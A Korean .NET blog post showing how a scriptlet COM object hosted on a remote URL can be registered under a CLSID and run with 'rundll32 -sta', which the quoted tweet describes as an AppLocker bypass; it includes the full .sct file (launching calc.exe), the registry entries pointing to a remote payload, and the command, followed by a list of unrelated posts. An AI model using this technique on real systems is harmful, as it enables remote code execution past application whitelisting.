Microsoft MVP성태의 닷넷 이야기
글쓴 사람
정성태 (techsharer at outlook.com)
홈페이지
첨부 파일
 

레지스트리에 등록된 원격지 스크립트 COM 객체 실행 방법

오호... 트위터에서 다음의 글을 보게 되었습니다. ^^

@bohops
; https://twitter.com/bohops/status/1011350358566821891

Interesting way to call a COM CLSID:

rundll32.exe -sta {CLSID}
rundll32.exe /sta {CLSID}

Use this with @subTee's #squiblydoo COM Hijack method for a default AppLocker Bypass

Haven't found any sec-related resources with -sta (single threaded apartment)

Anyone seen this before?

그러니까, COM 객체를 script로 만들 수 있는 기술을 마이크로소프트가 제공하는데요. (정말 오랜만에 보는 군요. scriptlet! 이젠 MSDN에서조차도 자료가 거의 남아 있지 않는데. ^^;)

Scriptlets
; http://www.drdobbs.com/scriptlets/199101569

이 legacy가 아직도 살아있어 Windows 10에서도 동작을 하고 있습니다. 간략하게 기술해 보면, Web 상에 다음과 같은 Script 파일을 보관해 두고,

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Scripting.Dictionary"
    progid="Scripting.Dictionary"
    version="1"
    classid="{00000000-0000-0000-0000-0000000000FF}"
    remotable="true"
    >
</registration>

<script language="JScript">
<![CDATA[

        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    
    
]]>
</script>

</scriptlet>

로컬 PC의 CLSID에 위의 scriptlet COM 객체에 명시한 classid의 값으로 다음과 같이 등록해 줍니다.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}]

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}\InprocServer32]
@="C:\\\\WINDOWS\\\\system32\\\\scrobj.dll"

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}\ScriptletURL]
@="https://raw.githubusercontent.com/stjeong/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"

자, 이제 마지막으로 명령행 창을 열고 해당 COM 객체를 생성해 줍니다.

rundll32 -sta {00000000-0000-0000-0000-0000000000FF}

잘 실행되는군요. ^^

rundll_comserver_1.png




[이 글에 대해서 여러분들과 의견을 공유하고 싶습니다. 틀리거나 미흡한 부분 또는 의문 사항이 있으시면 언제든 댓글 남겨주십시오.]







[최초 등록일: ]
[최종 수정일: 6/27/2018]

Creative Commons License
이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이센스에 따라 이용하실 수 있습니다.
by SeongTae Jeong, mailto:techsharer at outlook.com

비밀번호

댓글 작성자
 




... [91]  92  93  94  95  96  97  98  99  100  101  102  103  104  105  ...
NoWriterDateCnt.TitleFile(s)
11657정성태8/18/201819907사물인터넷: 30. 릴레이(Relay) 제어파일 다운로드3
11656정성태8/16/201815684사물인터넷: 29. 트랜지스터와 병렬로 연결한 LED파일 다운로드1
11655정성태8/16/201817949사물인터넷: 28. 저항과 병렬로 연결한 LED파일 다운로드1
11654정성태8/15/201819206사물인터넷: 27. 병렬 회로의 저항, 전압 및 전류파일 다운로드1
11653정성태8/14/201820047사물인터넷: 26. 입력 전압에 따른 LED의 전압/저항 변화 [1]파일 다운로드1
11652정성태8/14/201817469사물인터넷: 25. 컬렉터 9V, 베이스에 5V와 3.3V 전압으로 테스트하는 C1815 트랜지스터파일 다운로드1
11651정성태8/14/201822605사물인터넷: 24. 9V 전압에서 테스트하는 C1815 트랜지스터 [1]파일 다운로드3
11650정성태8/14/201817007사물인터넷: 23. 가변저항으로 분압파일 다운로드1
11649정성태8/12/201819331사물인터넷: 22. 저항에 따른 전류 테스트파일 다운로드1
11648정성태8/12/201820756사물인터넷: 21. 퓨즈를 이용한 회로 보호파일 다운로드3
11647정성태8/8/201820888오류 유형: 476. 음수의 음수는 여전히 음수가 되는 수(절대값이 음수인 수)
11646정성태8/8/201816919오류 유형: 475. gacutil.exe 실행 시 "Failure initializing gacutil" 오류 발생
11645정성태8/8/201819125오류 유형: 474. 닷넷 COM+ - Failed to load the runtime. [1]
11644정성태8/6/201822030디버깅 기술: 118. windbg - 닷넷 개발자를 위한 MEX Debugging Extension 소개
11643정성태8/6/201821631사물인터넷: 20. 아두이노 레오나르도 R3 호환 보드의 3.3v 핀의 LED 전압/전류 테스트 [1]파일 다운로드1
11642정성태8/3/201820463Graphics: 20. Unity - LightMode의 ForwardBase에 따른 _WorldSpaceLightPos0 값 변화
11641정성태8/3/201825985Graphics: 19. Unity로 실습하는 Shader (10) - 빌보드 구현 [1]파일 다운로드1
11640정성태8/3/201822140Graphics: 18. Unity - World matrix(unity_ObjectToWorld)로부터 Position, Rotation, Scale 값을 복원하는 방법파일 다운로드1
11639정성태8/2/201819732디버깅 기술: 117. windbg - 덤프 파일로부터 추출한 DLL을 참조하는 방법
11638정성태8/2/201818122오류 유형: 473. windbg - 덤프 파일로부터 추출한 DLL 참조 시 "Resolved file has a bad image, no metadata, or is otherwise inaccessible." 빌드 오류
11637정성태8/1/201822523Graphics: 17. Unity - World matrix(unity_ObjectToWorld)로부터 TRS(이동/회전/크기) 행렬로 복원하는 방법파일 다운로드1
11636정성태8/1/201829922Graphics: 16. 3D 공간에서 두 점이 이루는 각도 구하기파일 다운로드1
11635정성태8/1/201818641오류 유형: 472. C# 컴파일 오류 - Your project is not referencing the ".NETFramework,Version=v3.5" framework.
11634정성태8/1/201821591.NET Framework: 790. .NET Thread 상태가 Cooperative일 때 GC hang 현상 재현 방법파일 다운로드1
11633정성태7/29/201825518Graphics: 15. Unity - shader의 World matrix(unity_ObjectToWorld)를 수작업으로 구성 [2]파일 다운로드1
11632정성태7/28/201827836Graphics: 14. C# - Unity에서 캐릭터가 바라보는 방향을 기준으로 카메라의 위치 이동 및 회전하는 방법
... [91]  92  93  94  95  96  97  98  99  100  101  102  103  104  105  ...